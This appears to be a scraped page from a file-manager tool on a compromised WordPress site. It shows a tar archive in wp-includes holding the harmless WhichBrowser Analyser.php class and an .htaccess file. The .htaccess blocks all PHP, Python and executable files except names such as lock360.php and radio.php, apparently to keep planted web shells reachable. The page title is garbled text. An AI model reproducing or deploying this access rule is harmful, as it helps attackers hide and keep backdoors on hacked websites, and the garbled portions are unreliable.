���ѧۧݧ�ӧ�� �ާ֧ߧ֧էا֧� - ���֧էѧܧ�ڧ��ӧѧ�� - /home/zhaagvlk/public_html/wp-includes/Requests/library/block-bindings/parser.tar
���ѧ٧ѧ�
src/Analyser.php 0000644 00000001621 15157450036 0007630 0 ustar 00 <?php namespace WhichBrowser; use WhichBrowser\Constants; use WhichBrowser\Model\Main; class Analyser { use Analyser\Header, Analyser\Derive, Analyser\Corrections, Analyser\Camouflage; private $data; private $options; private $headers = []; public function __construct($headers, $options = []) { $this->headers = $headers; $this->options = (object) $options; } public function setData(&$data) { $this->data =& $data; } public function &getData() { return $this->data; } public function analyse() { if (!isset($this->data)) { $this->data = new Main(); } /* Start the actual analysing steps */ $this->analyseHeaders() ->deriveInformation() ->applyCorrections() ->detectCamouflage() ->deriveDeviceSubType(); } } src/Data/.htaccess 0000644 00000000644 15157450036 0010014 0 ustar 00 <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>